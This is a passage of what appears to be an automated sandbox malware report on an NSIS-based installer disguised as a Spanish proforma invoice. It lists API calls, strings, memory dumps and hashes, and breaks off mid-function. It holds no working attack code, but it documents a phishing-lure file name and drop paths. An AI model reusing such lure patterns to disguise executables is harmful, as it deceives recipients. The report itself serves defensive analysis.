                                                  • Opcode ID: 80f769dd52ef50b98ac4ee3b8e5078c3c4b13f4473397686cc26b2e8563c8aa6
                                                  • Instruction ID: c35343ed1f7d98226e05a252425b28c23e5d84a8037d744bc313deda154a55be
                                                  • Opcode Fuzzy Hash: 80f769dd52ef50b98ac4ee3b8e5078c3c4b13f4473397686cc26b2e8563c8aa6
                                                  • Instruction Fuzzy Hash: C0B012727010019FEE408B35DC8FF343354F700304F640050F700C1050C1A04800852C

                                                  Non-executed Functions

                                                  Function 004049B1 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404A00
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404A2A
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404AE6
                                                  • lstrcmpiW.KERNEL32(Call,00422F08,00000000,?,?), ref: 00404B18
                                                  • lstrcatW.KERNEL32(?,Call), ref: 00404B24
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36
                                                    • Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98
                                                    • Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",77943420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                    • Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                    • Part of subcall function 004067EF: CharNextW.USER32(?,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",77943420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                    • Part of subcall function 004067EF: CharPrevW.USER32(?,?,77943420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                  • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,?,00420ED8,?,?,000003FB,?), ref: 00404BF9
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14
                                                    • Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                    • Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
                                                    • Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet$Call
                                                  • API String ID: 2624150263-3533344981
                                                  • Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                  • Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
                                                  • Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                  • Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D
                                                  Function 00404F2D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404F45
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404F50
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
                                                  • SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00405006
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
                                                  • DeleteObject.GDI32(00000000), ref: 00405027
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129
                                                    • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,?,00404320), ref: 00404503
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0040516B
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
                                                  • ShowWindow.USER32(?,00000005), ref: 00405189
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405357
                                                  • GlobalFree.KERNEL32(?), ref: 00405367
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405489
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
                                                  • InvalidateRect.USER32(?,00000000,?), ref: 004054C3
                                                  • ShowWindow.USER32(?,00000000), ref: 00405511
                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040551C
                                                  • ShowWindow.USER32(00000000), ref: 00405523
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                  • Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
                                                  • Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                  • Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18
                                                  Function 0040467F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040471D
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404731
                                                  • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040474E
                                                  • GetSysColor.USER32(?), ref: 0040475F
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
                                                  • lstrlenW.KERNEL32(?), ref: 00404780
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
                                                  • GetDlgItem.USER32(?,0000040A), ref: 004047FB
                                                  • SendMessageW.USER32(00000000), ref: 00404802
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040482D
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
                                                  • SetCursor.USER32(00000000), ref: 00404881
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
                                                  • SetCursor.USER32(00000000), ref: 0040489D
                                                  • SendMessageW.USER32(00000111,?,00000000), ref: 004048CC
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: Call$N
                                                  • API String ID: 3103080414-3438112850
                                                  • Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                  • Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
                                                  • Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                  • Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98
                                                  Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,Baboodom111 Setup,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: Baboodom111 Setup$F
                                                  • API String ID: 941294808-1763592606
                                                  • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                  • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                  • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                  • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                  Function 00406187 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406322,?,?), ref: 004061C2
                                                  • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB
                                                    • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                    • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                  • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
                                                  • wsprintfA.USER32 ref: 00406206
                                                  • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,?,00426DA8,?,?,?,?,?), ref: 00406241
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
                                                  • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
                                                  • GlobalFree.KERNEL32(00000000), ref: 004062EF
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6
                                                    • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,80000000,00000003), ref: 00406035
                                                    • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406057
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]
                                                  • API String ID: 2171350718-461813615
                                                  • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                  • Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
                                                  • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                  • Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD
                                                  Function 004067EF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",77943420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                  • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                  • CharNextW.USER32(?,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",77943420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                  • CharPrevW.USER32(?,?,77943420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004067F0
                                                  • "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe", xrefs: 00406833
                                                  • *?|<>/":, xrefs: 00406841
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-1882904355
                                                  • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                  • Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
                                                  • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                  • Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD
                                                  Function 00404527 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00404544
                                                  • GetSysColor.USER32(00000000), ref: 00404582
                                                  • SetTextColor.GDI32(?,00000000), ref: 0040458E
                                                  • SetBkMode.GDI32(?,?), ref: 0040459A
                                                  • GetSysColor.USER32(?), ref: 004045AD
                                                  • SetBkColor.GDI32(?,?), ref: 004045BD
                                                  • DeleteObject.GDI32(?), ref: 004045D7
                                                  • CreateBrushIndirect.GDI32(?), ref: 004045E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
                                                  • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54
                                                  Function 00404E7B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
                                                  • GetMessagePos.USER32 ref: 00404E9E
                                                  • ScreenToClient.USER32(?,?), ref: 00404EB8
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
                                                  • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4
                                                  Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FD6
                                                  • MulDiv.KERNEL32(0008D10E,00000064,0008D312), ref: 00403001
                                                  • wsprintfW.USER32 ref: 00403011
                                                  • SetWindowTextW.USER32(?,?), ref: 00403021
